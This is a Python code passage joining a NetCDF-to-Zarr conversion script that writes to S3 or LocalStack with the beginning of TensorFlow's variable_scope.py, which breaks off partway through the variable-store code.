import collections import os import sys import multiprocessing from multiprocessing import Semaphore from typing import Union import re import s3fs import numpy as np import zarr from netCDF4 import Dataset region = os.environ.get('AWS_DEFAULT_REGION') or 'us-west-2' # Some global that may be shared by different methods binary_prefix_conversion_map = {"Ki": 1024, "Mi": 1048576, "Gi": 1073741824} def make_localstack_s3fs(): host = os.environ.get('LOCALSTACK_HOST') or 'host.docker.internal' return s3fs.S3FileSystem( use_ssl=False, key='ACCESS_KEY', secret='SECRET_KEY', client_kwargs=dict( region_name=region, endpoint_url='http://%s:4572' % (host))) def make_s3fs(): return s3fs.S3FileSystem(client_kwargs=dict(region_name=region)) def netcdf_to_zarr(src, dst): """ Convert the NetCDF file at src to the zarr file at dst, preserving data, metadata, and group hierarchy Parameters ---------- src : string | netCDF4.Dataset The file to convert, either a location on disk or an already-opened dataset dst : string | collections.MutableMapping The output zarr file. Either a location on disk into which a zarr.DirectoryStore will be written or a MutableMapping into which zarr data can be written. """ managed_resources = [] try: # Allow passing in a path to a store or a file if isinstance(src, str): src = Dataset(src, 'r') managed_resources.append(src) if isinstance(dst, str): dst = zarr.DirectoryStore(dst) managed_resources.append(dst) src.set_auto_mask(False) src.set_auto_scale(True) __copy_group(src, zarr.group(dst, overwrite=True)) zarr.convenience.consolidate_metadata(dst) finally: for resource in managed_resources: try: resource.close() except BaseException: pass def scale_attribute(src, attr, scale_factor, add_offset): """ Scales an unscaled NetCDF attribute Parameters ---------- src : netCDF4.Variable the source variable to copy attr : collections.Sequence | numpy.ndarray | number the NetCDF variable attribute that needs to be scaled scale_factor : number the number used to multiply unscaled data add_offset : number the number added to unscaled data after multiplied by scale_factor Returns ------- list | number the scaled data; either a list of floats or a float scalar """ def scale_fn(x): return float(x * scale_factor + add_offset) unscaled = getattr(src, attr) if isinstance(unscaled, collections.Sequence) or isinstance(unscaled, np.ndarray): return [scale_fn(u) for u in unscaled] else: return scale_fn(unscaled) def compute_chunksize(shape: Union[tuple, list], datatype: str, compression_ratio: float = 1.5, compressed_chunksize_byte: Union[int, str] = '10 Mi'): """ Compute the chunksize for a given shape and datatype based on the compression requirement We will try to make it equal along different dimensions, without exceeding the given shape boundary Parameters ---------- shape : list/tuple the zarr shape datatype: str the zarr data type which must be recognized by numpy compression_ratio: str expected compression ratio for each chunk default to 7.2 which is the compression ratio from a chunk size of (3000, 3000) with double precision compressed to 10 Mi compressed_chunksize_byte: int/string expected chunk size in bytes after compression If it's a string, assuming it follows NIST standard for binary prefix (https://physics.nist.gov/cuu/Units/binary.html) except that only Ki, Mi, and Gi are allowed. Space is optional between number and unit. Returns ------- list/tuple the regenerated new zarr chunks """ # convert compressed_chunksize_byte to integer if it's a str if type(compressed_chunksize_byte) == str: try: (value, unit) = re.findall( r"^\s*([\d.]+)\s*(Ki|Mi|Gi)\s*$", compressed_chunksize_byte )[0] except IndexError: err_message = """Chunksize needs to be either an integer or string. If it's a string, assuming it follows NIST standard for binary prefix (https://physics.nist.gov/cuu/Units/binary.html) except that only Ki, Mi, and Gi are allowed.""" raise ValueError(err_message) compressed_chunksize_byte = int(float(value)) * int(binary_prefix_conversion_map[unit]) # get product of chunksize along different dimensions before compression if compression_ratio < 1.: raise ValueError("Compression ratio < 1 found when estimating chunk size.") chunksize_unrolled = int( compressed_chunksize_byte * compression_ratio / np.dtype(datatype).itemsize ) # compute the chunksize by trying to make it equal along different dimensions, # without exceeding the given shape boundary suggested_chunksize = np.full(len(shape), 0) shape_array = np.array(shape) dim_to_process = np.full(len(shape), True) while not (~dim_to_process).all(): chunksize_remaining = chunksize_unrolled // suggested_chunksize[~dim_to_process].prod() chunksize_oneside = int(pow(chunksize_remaining, 1 / dim_to_process.sum())) if (shape_array[dim_to_process] >= chunksize_oneside).all(): suggested_chunksize[dim_to_process] = chunksize_oneside dim_to_process[:] = False else: dim_to_fill = dim_to_process & (shape_array < chunksize_oneside) suggested_chunksize[dim_to_fill] = shape_array[dim_to_fill] dim_to_process[dim_to_fill] = False # return new chunks suggested_chunksize = type(shape)(suggested_chunksize.tolist()) return suggested_chunksize def __copy_variable(src, dst_group, name, sema=Semaphore(20)): """ Copies the variable from the NetCDF src variable into the Zarr group dst_group, giving it the provided name Parameters ---------- src : netCDF4.Variable the source variable to copy dst_group : zarr.hierarchy.Group the group into which to copy the variable name : string the name of the variable in the destination group sema: multiprocessing.synchronize.Semaphore Semaphore used to limit concurrent processes NOTE: the default value 20 is empirical Returns ------- zarr.core.Array the copied variable """ # acquire Semaphore sema.acquire() # connect to s3 if os.environ.get('USE_LOCALSTACK') == 'true': s3 = make_localstack_s3fs() else: s3 = make_s3fs() group_name = os.path.join(dst_group.store.root, dst_group.path) dst = s3.get_mapper(root=group_name, check=False, create=True) dst_group = zarr.group(dst) # create zarr group/dataset chunks = src.chunking() if chunks == 'contiguous' or chunks is None: chunks = src.shape if not chunks and len(src.dimensions) == 0: # Treat a 0-dimensional NetCDF variable as a zarr group dst = dst_group.create_group(name) else: dtype = src.dtype dtype = src.scale_factor.dtype if hasattr(src, 'scale_factor') else dtype dtype = src.add_offset.dtype if hasattr(src, 'add_offset') else dtype new_chunks = compute_chunksize(src.shape, dtype) dst = dst_group.create_dataset(name, data=src, shape=src.shape, chunks=tuple(new_chunks), dtype=dtype) # Apply scale factor and offset to attributes that are not automatically scaled by NetCDF scaled = {} scale_factor = getattr(src, 'scale_factor', 1.0) add_offset = getattr(src, 'add_offset', 0.0) if scale_factor != 1.0 or add_offset != 0.0: unscaled_attributes = ['valid_range', 'valid_min', 'valid_max', '_FillValue', 'missing_value'] present_attributes = [attr for attr in unscaled_attributes if hasattr(src, attr)] scaled = {attr: scale_attribute(src, attr, scale_factor, add_offset) for attr in present_attributes} # xarray requires the _ARRAY_DIMENSIONS metadata to know how to label axes __copy_attrs(src, dst, scaled, _ARRAY_DIMENSIONS=list(src.dimensions)) # release Semaphore sema.release() return dst def __copy_attrs(src, dst, scaled={}, **kwargs): """ Copies all attributes from the source group or variable into the destination group or variable. Converts netCDF4 variable values from their native type (typically Numpy dtypes) into JSON-serializable values that Zarr can store Parameters ---------- src : netCDF4.Group | netCDF4.Variable The source from which to copy attributes dst : zarr.hierarchy.Group | zarr.core.Array The destination into which to copy attributes. **kwargs : dict Additional attributes to add to the destination """ attrs = {key: __netcdf_attr_to_python(getattr(src, key)) for key in src.ncattrs()} attrs.update(kwargs) attrs.update(scaled) attrs.pop('scale_factor', None) attrs.pop('add_offset', None) dst.attrs.put(attrs) def __copy_group(src, dst): """ Recursively copies the source netCDF4 group into the destination Zarr group, along with all sub-groups, variables, and attributes NOTE: the variables will be copied in parallel processes via multiprocessing; 'fork' is used as the start-method because OSX/Windows is using 'spawn' by default, which will introduce overhead and difficulties pickling data objects (and to the test); Semaphore is used to limit the number of concurrent processes, which is set to double the number of cpu-s found on the host Parameters ---------- src : netCDF4.Group the NetCDF group to copy from dst : zarr.hierarchy.Group the existing Zarr group to copy into """ __copy_attrs(src, dst) for name, item in src.groups.items(): __copy_group(item, dst.create_group(name.split('/').pop())) procs = [] fork_ctx = multiprocessing.get_context('fork') sema = Semaphore(multiprocessing.cpu_count() * 2) for name, item in src.variables.items(): proc = fork_ctx.Process(target=__copy_variable, args=(item, dst, name, sema)) proc.start() procs.append(proc) for proc in procs: proc.join() def __netcdf_attr_to_python(val): """ Given an attribute value read from a NetCDF file (typically a numpy type), returns the value as a Python primitive type, e.g. np.integer -> int. Returns the value unaltered if it does not need conversion or is unrecognized Parameters ---------- val : any An attribute value read from a NetCDF file Returns ------- any The converted value """ if isinstance(val, np.integer): return int(val) elif isinstance(val, np.floating): return float(val) elif isinstance(val, np.ndarray): return [__netcdf_attr_to_python(v) for v in val.tolist()] elif isinstance(val, bytes): # Assumes bytes are UTF-8 strings. This holds for attributes. return val.decode("utf-8") return val if __name__ == '__main__': netcdf_to_zarr(sys.argv[1], sys.argv[2])
variable_scope.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """A class to store named variables and a scope operator to manage sharing.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections as collections_lib import copy import enum # pylint: disable=g-bad-import-order import functools import sys import threading import traceback import six from six import iteritems from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.python.eager import context from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_shape from tensorflow.python.ops import array_ops from tensorflow.python.ops import init_ops from tensorflow.python.ops import resource_variable_ops from tensorflow.python.ops import variables from tensorflow.python.platform import tf_logging as logging from tensorflow.python.util import deprecation from tensorflow.python.util import function_utils from tensorflow.python.util import tf_contextlib from tensorflow.python.util import tf_inspect from tensorflow.python.util.tf_export import tf_export __all__ = [ "AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable", "get_local_variable", "variable_scope", "variable_op_scope", "no_regularizer", "VariableSynchronization", "VariableAggregation" ] class _PartitionInfo(object): """Holds partition info used by initializer functions. """ def __init__(self, full_shape, var_offset): """Constructor. Args: full_shape: Tuple or list of `int` indicating the full combined shape of the partitioned variables. var_offset: Tuple or list of `int` specifying offset of this partition with respect to the full variable for each dimension. Raises: TypeError: If `full_shape` or `var_offset` is not a sequence. ValueError: If `full_shape` or `var_offset` differ in length. If `var_offset` exceeds `full_shape` in any dimension. """ if not isinstance(full_shape, collections_lib.Sequence) or isinstance( full_shape, six.string_types): raise TypeError( "`full_shape` must be a sequence (like tuple or list) instead of " + type(full_shape).__name__) if not isinstance(var_offset, collections_lib.Sequence) or isinstance( var_offset, six.string_types): raise TypeError( "`var_offset` must be a sequence (like tuple or list) instead of " + type(var_offset).__name__) if len(var_offset) != len(full_shape): raise ValueError( "Expected equal length, but `var_offset` is of length {} while " "full_shape is of length {}.".format( len(var_offset), len(full_shape))) for i in xrange(len(full_shape)): offset = var_offset[i] shape = full_shape[i] if offset < 0 or offset >= shape: raise ValueError( "Expected 0 <= offset < shape but found offset={}, shape={} for " "var_offset={}, full_shape={}".format(offset, shape, var_offset, full_shape)) self._full_shape = full_shape self._var_offset = var_offset @property def full_shape(self): return self._full_shape @property def var_offset(self): return self._var_offset def single_offset(self, shape): """Returns the offset when the variable is partitioned in at most one dim. Args: shape: Tuple or list of `int` indicating the shape of one specific variable partition. Returns: `int` representing the offset in the dimension along which the variable is partitioned. Returns 0 if the variable is not being partitioned. Raises: ValueError: Depending on self.single_slice_dim(). """ single_slice_dim = self.single_slice_dim(shape) # If this variable is not being partitioned at all, single_slice_dim() could # return None. if single_slice_dim is None: return 0 return self.var_offset[single_slice_dim] def single_slice_dim(self, shape): """Returns the slice dim when the variable is partitioned only in one dim. Args: shape: Tuple or list of `int` indicating the shape of one specific variable partition. Returns: `int` representing the dimension that the variable is partitioned in, or `None` if the variable doesn't seem to be partitioned at all. Raises: TypeError: If `shape` is not a sequence. ValueError: If `shape` is not the same length as `self.full_shape`. If the variable is partitioned in more than one dimension. """ if not isinstance(shape, collections_lib.Sequence) or isinstance( shape, six.string_types): raise TypeError( "`shape` must be a sequence (like tuple or list) instead of " + type(shape).__name__) if len(shape) != len(self.full_shape): raise ValueError( "Expected equal length, but received shape={} of length {} while " "self.full_shape={} is of length {}.".format(shape, len( shape), self.full_shape, len(self.full_shape))) for i in xrange(len(shape)): if self.var_offset[i] + shape[i] > self.full_shape[i]: raise ValueError( "With self.var_offset={}, a partition of shape={} would exceed " "self.full_shape={} in dimension {}.".format( self.var_offset, shape, self.full_shape, i)) slice_dim = None for i in xrange(len(shape)): if shape[i] == self.full_shape[i]: continue if slice_dim is not None: raise ValueError( "Cannot use single_slice_dim() with shape={} and " "self.full_shape={} since slice dim could be either dimension {} " "or {}.".format(shape, self.full_shape, i, slice_dim)) slice_dim = i return slice_dim class _ReuseMode(enum.Enum): """Mode for variable access within a variable scope.""" # Indicates that variables are to be fetched if they already exist or # otherwise created. AUTO_REUSE = 1 # TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of # enum values. # REUSE_FALSE = 2 # REUSE_TRUE = 3 # TODO(apassos) remove these forwarding symbols. VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name AUTO_REUSE = _ReuseMode.AUTO_REUSE tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE") AUTO_REUSE.__doc__ = """ When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that get_variable() should create the requested variable if it doesn't exist or, if it does exist, simply return it. """ _DEFAULT_USE_RESOURCE = False @tf_export(v1=["enable_resource_variables"]) def enable_resource_variables(): """Creates resource variables by default. Resource variables are improved versions of TensorFlow variables with a well-defined memory model. Accessing a resource variable reads its value, and all ops which access a specific read value of the variable are guaranteed to see the same value for that tensor. Writes which happen after a read (by having a control or data dependency on the read) are guaranteed not to affect the value of the read tensor, and similarly writes which happen before a read are guaranteed to affect the value. No guarantees are made about unordered read/write pairs. Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0 feature. """ global _DEFAULT_USE_RESOURCE _DEFAULT_USE_RESOURCE = True @deprecation.deprecated( None, "non-resource variables are not supported in the long term") @tf_export(v1=["disable_resource_variables"]) def disable_resource_variables(): """Opts out of resource variables. If your code needs tf.disable_resource_variables() to be called to work properly please file a bug. """ global _DEFAULT_USE_RESOURCE _DEFAULT_USE_RESOURCE = False class _VariableStore(object): """Variable store that carries a number of named Variables. New variable names and new variables can be created; all stored variables are initialized with the initializer passed to __init__. Attributes: vars: a dictionary with string names (same as passed in GetVar) as keys and the corresponding TensorFlow Variables as values. """ def __init__(self): """Create a variable store.""" self._vars = {} # A dictionary of the stored TensorFlow variables. self._partitioned_vars = {} # A dict of the stored PartitionedVariables. self._store_eager_variables = False def get_variable(self, name, shape=None, dtype=dtypes.float32, initializer=None, regularizer=None, reuse=None, trainable=None, collections=None, caching_device=None, partitioner=None, validate_shape=True, use_resource=None, custom_getter=None, constraint=None, synchronization=VariableSynchronization.AUTO, aggregation=VariableAggregation.NONE): """Gets an existing variable with these parameters or create a new one. If a variable with the given name is already stored, we return the stored variable. Otherwise, we create a new one. Set `reuse` to `True` when you only want to reuse existing Variables. Set `reuse` to `False` when you only want to create new Variables. Set `reuse` to None (the default) or tf.AUTO_REUSE when you want variables to be created if they don't exist or returned if they do. If initializer is `None` (the default), the default initializer passed in the constructor is used. If that one is `None` too, we use a new `glorot_uniform_initializer`. If initializer is a Tensor, we use it as a value and derive the shape from the initializer. If a partitioner is provided, a `PartitionedVariable` is returned. Accessing this object as a `Tensor` returns the shards concatenated along the partition axis. Some useful partitioners are available. See, e.g., `variable_axis_size_partitioner` and `min_max_variable_partitioner`. Args: name: The name of the new or existing variable. shape: Shape of the new or existing variable. dtype: Type of the new or existing variable (defaults to `DT_FLOAT`). initializer: Initializer for the variable. regularizer: A (Tensor -> Tensor or None) function; the result of applying it on a newly created variable will be added to the collection GraphKeys.REGULARIZATION_LOSSES and can be used for regularization. reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of variables. When eager execution is enabled this argument is always forced to be False. trainable: If `True` also add the variable to the graph collection `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable` defaults to `True` unless `synchronization` is set to `ON_READ`. collections: List of graph collections keys to add the `Variable` to. Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`). caching_device: Optional device string or function describing where the Variable should be cached for reading. Defaults to the Variable's device. If not `None`, caches on another device. Typical use is to cache on the device where the Ops using the `Variable` reside, to deduplicate copying through `Switch` and other conditional statements. partitioner: Optional callable that accepts a fully defined `TensorShape` and dtype of the `Variable` to be created, and returns a list of partitions for each axis (currently only one axis can be partitioned). validate_shape: If False, allows the variable to be initialized with a value of unknown shape. If True, the default, the shape of initial_value must be known. use_resource: If False, creates a regular Variable. If True, creates instead an experimental ResourceVariable which has well-defined semantics. Defaults to False (will later change to True). When eager execution is enabled this argument is always forced to be true. custom_getter: Callable that takes as a first argument the true getter, and allows overwriting the internal get_variable method. The signature of `custom_getter` should match that of this method, but the most future-proof version will allow for changes: `def custom_getter(getter, *args, **kwargs)`. Direct access to all `get_variable` parameters is also allowed: `def custom_getter(getter, name, *args, **kwargs)`. A simple identity custom getter that simply creates variables with modified names is: ```python def custom_getter(getter, name, *args, **kwargs): return getter(name + '_suffix', *args, **kwargs) ``` constraint: An optional projection function to be applied to the variable after being updated by an `Optimizer` (e.g. used to implement norm constraints or value constraints for layer weights). The function must take as input the unprojected Tensor representing the value of the variable and return the Tensor for the projected value (which must have the same shape). Constraints are not safe to use when doing asynchronous distributed training. synchronization: Indicates when a distributed a variable will be aggregated. Accepted values are constants defined in the class `tf.VariableSynchronization`. By default the synchronization is set to `AUTO` and the current `DistributionStrategy` chooses when to synchronize. If `synchronization` is set to `ON_READ`, `trainable` must not be set to `True`. aggregation: Indicates how a distributed variable will be aggregated. Accepted values are constants defined in the class `tf.VariableAggregation`. Returns: The created or existing `Variable` (or `PartitionedVariable`, if a partitioner was used). Raises: ValueError: when creating a new variable and shape is not declared, when reusing a variable and specifying a conflicting shape, or when violating reuse during variable creation. RuntimeError: when eager execution is enabled and not called from an EagerVariableStore. """ if custom_getter is not None and not callable(custom_getter): raise ValueError( "Passed a custom_getter which is not callable: %s" % custom_getter) with ops.init_scope(): if context.executing_eagerly(): # Variable creation and initialization takes place in `init_scope`s; # as such, if an `init_scope` lifts us into the eager context, then we # need to use `ResourceVariable`s. use_resource = True # Note that it's fine to reuse eager variables whose initialization was # lifted from a function-building graph into the eager context (that's why # the following clause is not wrapped in an `init_scope`); lifted variables # are tracked by the graph's `VariableStore`. if context.executing_eagerly(): if not self._store_eager_variables and reuse: raise RuntimeError( "When eager execution is enabled variable reuse is only supported" " when an EagerVariableStore is active. See the documentation on" " EagerVariableStore for example usage.") if self._store_eager_variables: reuse = AUTO_REUSE # If a *_ref type is passed in an error would be triggered further down the # stack. We prevent this using base_dtype to get a non-ref version of the # type, before doing anything else. When _ref types are removed in favor of # resources, this line can be removed. try: dtype = dtype.base_dtype except AttributeError: # .base_dtype not existing means that we will try and use the raw dtype # which was passed in - this might be a NumPy type which is valid. pass # This is the main logic of get_variable. However, custom_getter # may override this logic. So we save it as a callable and pass # it to custom_getter. # Note: the parameters of _true_getter, and their documentation, match # *exactly* item-for-item with the docstring of this method. def _true_getter( # pylint: disable=missing-docstring name, shape=None, dtype=dtypes.float32, initializer=None, regularizer=None, reuse=None, trainable=None, collections=None, caching_device=None, partitioner=None, validate_shape=True, use_resource=None, constraint=None, synchronization=VariableSynchronization.AUTO, aggregation=VariableAggregation.NONE): is_scalar = (shape is not None and isinstance(shape, collections_lib.Sequence) and not shape) # Partitioned variable case if partitioner is not None and not is_scalar: if not callable(partitioner): raise ValueError( "Partitioner must be callable, but received: %s" % partitioner) with ops.name_scope(None): return self._get_partitioned_variable(name=name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, reuse=reuse, trainable=trainable, collections=collections, caching_device=caching_device, partitioner=partitioner, validate_shape=validate_shape, use_resource=use_resource, constraint=constraint) # Special case for partitioned variable to allow reuse without having to # specify partitioner. if (reuse is True and partitioner is None and name in self._partitioned_vars): return self._get_partitioned_variable(name=name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, reuse=reuse, trainable=trainable, collections=collections, caching_device=caching_device, partitioner=None, validate_shape=validate_shape, use_resource=use_resource, constraint=constraint) # Single variable case if "%s/part_0" % name in self._vars: raise ValueError( "No partitioner was provided, but a partitioned version of the " "variable was found: %s/part_0. Perhaps a variable of the same " "name was already created with partitioning?" % name) return self._get_single_variable( name=name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, reuse=reuse, trainable=trainable, collections=collections, caching_device=caching_device, validate_shape=validate_shape, use_resource=use_resource, constraint=constraint, synchronization=synchronization, aggregation=aggregation) # Set trainable value based on synchronization value. trainable = _get_trainable_value( synchronization=synchronization, trainable=trainable) if custom_getter is not None: # Handle backwards compatibility with getter arguments that were added # to the API after users started writing custom getters. custom_getter_kwargs = { "getter": _true_getter, "name": name, "shape": shape, "dtype": dtype, "initializer": initializer, "regularizer": regularizer, "reuse": reuse, "trainable": trainable, "collections": collections, "caching_device": caching_device, "partitioner": partitioner, "validate_shape": validate_shape, "use_resource": use_resource, "synchronization": synchronization, "aggregation": aggregation, } # `fn_args` and `has_kwargs` can handle functions, `functools.partial`, # `lambda`. if ("constraint" in function_utils.fn_args(custom_getter) or function_utils.has_kwargs(custom_getter)): custom_getter_kwargs["constraint"] = constraint return custom_getter(**custom_getter_kwargs) else: return _true_getter( name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, reuse=reuse, trainable=trainable, collections=collections, caching_device=caching_device, partitioner=partitioner, validate_shape=validate_shape, use_resource=use_resource, constraint=constraint, synchronization=synchronization, aggregation=aggregation) def _get_partitioned_variable(self, name, partitioner, shape=None, dtype=dtypes.float32, initializer=None, regularizer=None, reuse=None, trainable=None, collections=None, caching_device=None, validate_shape=True, use_resource=None, constraint=None): """Gets or creates a sharded variable list with these parameters. The `partitioner` must be a callable that accepts a fully defined `TensorShape` and returns a sequence of integers (the `partitions`). These integers describe how to partition the given sharded `Variable` along the given dimension. That is, `partitions[1] = 3` means split the `Variable` into 3 shards along dimension 1. Currently, sharding along only one axis is supported. If the list of variables with the given name (prefix) is already stored, we return the stored variables. Otherwise, we create a new one. Set `reuse` to `True` when you only want to reuse existing Variables. Set `reuse` to `False` when you only want to create new Variables. Set `reuse` to None (the default) or tf.AUTO_REUSE when you want variables to be created if they don't exist or returned if they do. If initializer is `None` (the default), the default initializer passed in the constructor is used. If that one is `None` too, we use a new `glorot_uniform_initializer`. If initializer is a Tensor, we use it as a value and derive the shape from the initializer. If the initializer is a callable, then it will be called for each shard. Otherwise the initializer should match the shape of the entire sharded Variable, and it will be sliced accordingly for each shard. Some useful partitioners are available. See, e.g., `variable_axis_size_partitioner` and `min_max_variable_partitioner`. Args: name: the name of the new or existing sharded variable. partitioner: Optional callable that accepts a fully defined `TensorShape` and `dtype` of the Variable to be created, and returns a list of partitions for each axis (currently only one axis can be partitioned). shape: shape of the new or existing sharded variable. dtype: type of the new or existing sharded variable (defaults to `DT_FLOAT`). initializer: initializer for the sharded variable. regularizer: a (Tensor -> Tensor or None) function; the result of applying it on a newly created variable will be added to the collection GraphKeys.REGULARIZATION_LOSSES and can be used for regularization. reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of variables. trainable: If `True` also add the variable to the graph collection `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). collections: List of graph collections keys to add the Variable to. Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`). caching_device: Optional device string or function describing where the Variable should be cached for reading. Defaults to the Variable's device. If not `None`, caches on another device. Typical use is to cache on the device where the Ops using the Variable reside, to deduplicate copying through `Switch` and other conditional statements. validate_shape: If False, allows the variable to be initialized with a value of unknown shape. If True, the default, the shape of initial_value must be known. use_resource: If False, creates a regular Variable. If True, creates an experimental ResourceVariable which has well-defined semantics. Defaults to False (will later change to True). constraint: An optional projection function to be applied to the variable after being updated by an `Optimizer` (e.g. used to implement norm constraints or value constraints for layer weights). The function must take as input the unprojected Tensor representing the value of the variable and return the Tensor for the projected value (which must have the same shape). Constraints are not safe to use when doing asynchronous distributed training. Returns: A `PartitionedVariable` object. Raises: ValueError: when creating a new variable and shape is not declared, when reusing a variable and specifying a conflicting shape, when violating reuse during variable creation, or if an existing sharded variable exists for the given name but with different sharding. """ if context.executing_eagerly(): raise NotImplementedError("Partitioned variables are not yet supported " "when eager execution is enabled.") initializing_from_value = initializer is not None and isinstance( initializer, ops.Tensor) reuse_without_partition = reuse and not partitioner if name in self._vars: raise ValueError( "A partitioner was provided, but an unpartitioned version of the " "variable was found: %s. Perhaps a variable of the same name was " "already created without partitioning?" % name) shape = tensor_shape.as_shape(shape) if initializing_from_value: shape = shape.merge_with(initializer.get_shape()) if not reuse_without_partition: if not shape.is_fully_defined(): raise ValueError("Shape of a new partitioned variable (%s) must be " "fully defined, but instead was %s." % (name, shape)) if shape.ndims < 1: raise ValueError("A partitioned Variable must have rank at least 1, " "shape: %s" % shape) partitions = partitioner(shape=shape, dtype=dtype) if not isinstance(partitions, collections_lib.Sequence): raise ValueError("Partitioner must return a sequence, but saw: %s" % partitions) if len(partitions) != shape.ndims: raise ValueError( "Partitioner returned a partition list that does not match the " "Variable's rank: %s vs. %s" % (partitions, shape)) if any([p < 1 for p in partitions]): raise ValueError( "Partitioner returned zero partitions for some axes: %s" % partitions) if name in self._partitioned_vars: if reuse is False: raise ValueError( "Partitioned variable with name %s already exists. Did you mean to " "set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name) existing_var = self._partitioned_vars[name] if not shape.is_compatible_with(existing_var.get_shape()): raise ValueError( "Trying to reuse partitioned variable %s, but specified shape %s " "and found shape %s." % (name, shape, existing_var.get_shape())) if not dtype.is_compatible_with(existing_var.dtype): raise ValueError( "Trying to reuse partitioned variable %s, but specified dtype %s " "and found dtype %s." % (name, dtype.name, existing_var.dtype.name)) # pylint: disable=protected-access if (not reuse_without_partition and existing_var._get_partitions() != partitions): raise ValueError( "Trying to reuse partitioned variable %s, but specified partitions " "%s and found partitions %s." % (name, partitions, existing_var._get_partitions())) # pylint: enable=protected-access return existing_var if reuse is True: raise ValueError("PartitionedVariable %s does not exist, or was not " "created with tf.get_variable(). Did you mean to set " "reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name) slice_dim, slice_shape = _compute_slice_dim_and_shape( shape.as_list(), partitions) vs = [] num_slices = partitions[slice_dim] num_slices_with_excess = shape[slice_dim].value % num_slices slice_offset = [0] * shape.ndims if "%s/part_0" % name in self._vars: if "%s/part_%d" % (name, num_slices - 1) not in self._vars: raise ValueError( "Partitioner returned a different partitioning than what was " "already found. Partitioner returned %d shards, and shard " "%s/part_0 was found, but %s/part_%d was not." % (num_slices, name, name, num_slices - 1)) if "%s/part_%d" % (name, num_slices) in self._vars: raise ValueError( "Partitioner returned a different partitioning than what was " "already found. Partitioner returned %d shards, and shard " "%s/part_0 was found, but so was the extra shard %s/part_%d." % (num_slices, name, name, num_slices)) for i in xrange(num_slices): var_shape = slice_shape[:] var_offset = slice_offset[:] partition_info = _PartitionInfo( full_shape=shape.as_list(), var_offset=var_offset) if i < num_slices_with_excess: var_shape[slice_dim] += 1 slice_offset[slice_dim] += var_shape[slice_dim] var_full_name = "%s/part_%d" % (name, i) with ops.name_scope(var_full_name + "/PartitionedInitializer"): # Create the tensor to initialize the variable with default value. if initializer is None: init, initializing_from_value = self._get_default_initializer( name=name, shape=shape, dtype=dtype) if initializing_from_value: init_shape = None else: init_shape = var_shape elif callable(initializer): init = initializer init_shape = var_shape elif isinstance(initializer, ops.Tensor): init = array_ops.slice(initializer, var_offset, var_shape) # Use the dtype of the given tensor. dtype = init.dtype.base_dtype init_shape = None else: init = ops.convert_to_tensor(initializer, dtype=dtype) init = array_ops.slice(init, var_offset, var_shape) init_shape = None with ops.name_scope(None): var = self._get_single_variable( name=var_full_name, shape=init_shape, dtype=dtype, initializer=init, partition_info=partition_info, regularizer=regularizer, reuse=reuse, trainable=trainable, collections=collections, caching_device=caching_device, validate_shape=validate_shape, use_resource=use_resource, constraint=constraint) # pylint: disable=protected-access var._set_save_slice_info(variables.Variable.SaveSliceInfo( name, shape.as_list(), var_offset, var_shape)) vs.append(var) # pylint: enable=protected-access # pylint: disable=protected-access partitioned_var = variables.PartitionedVariable(name=name, shape=shape, dtype=dtype, variable_list=vs, partitions=partitions) # pylint: enable=protected-access self._partitioned_vars[name] = partitioned_var return partitioned_var def _get_single_variable(self, name, shape=None, dtype=dtypes.float32, initializer=None, regularizer=None, partition_info=None, reuse=None, trainable=None, collections=None, caching_device=None, validate_shape=True, use_resource=None, constraint=None, synchronization=VariableSynchronization.AUTO, aggregation=VariableAggregation.NONE): """Get or create a single Variable (e.g. a shard or entire variable). See the documentation of get_variable above (ignore partitioning components) for details. Args: name: see get_variable. shape: see get_variable. dtype: see get_variable. initializer: see get_variable. regularizer: see get_variable. partition_info: _PartitionInfo object. reuse: see get_variable. trainable: see get_variable. collections: see get_variable. caching_device: see get_variable. validate_shape: see get_variable. use_resource: see get_variable. constraint: see get_variable. synchronization: see get_variable. aggregation: see get_variable. Returns: A Variable. See documentation of get_variable above. Raises: ValueError: See documentation of get_variable above. """ # Set to true if initializer is a constant. initializing_from_value = False if initializer is not None and not callable(initializer): initializing_from_value = True if shape is not None and initializing_from_value: raise ValueError("If initializer is a constant, do not specify shape.") dtype = dtypes.as_dtype(dtype) shape = tensor_shape.as_shape(shape) if name in self._vars: # Here we handle the case when returning an existing variable. if reuse is False: tb = self._vars[name].op.traceback[::-1] # Throw away internal tf entries and only take a few lines. tb = [x for x in tb if "tensorflow/python" not in x[0]][:3] raise ValueError("Variable %s already exists, disallowed." " Did you mean to set reuse=True or " "reuse=tf.AUTO_REUSE in VarScope? " "Originally defined at:\n\n%s" % ( name, "".join(traceback.format_list(tb)))) found_var = self._vars[name] if not shape.is_compatible_with(found_var.get_shape()): raise ValueError("Trying to share variable %s, but specified shape %s" " and found shape %s." % (name, shape, found_var.get_shape())) if not dtype.is_compatible_with(found_var.dtype): dtype_str = dtype.name found_type_str = found_var.dtype.name raise ValueError("Trying to share variable %s, but specified dtype %s" " and found dtype %s." % 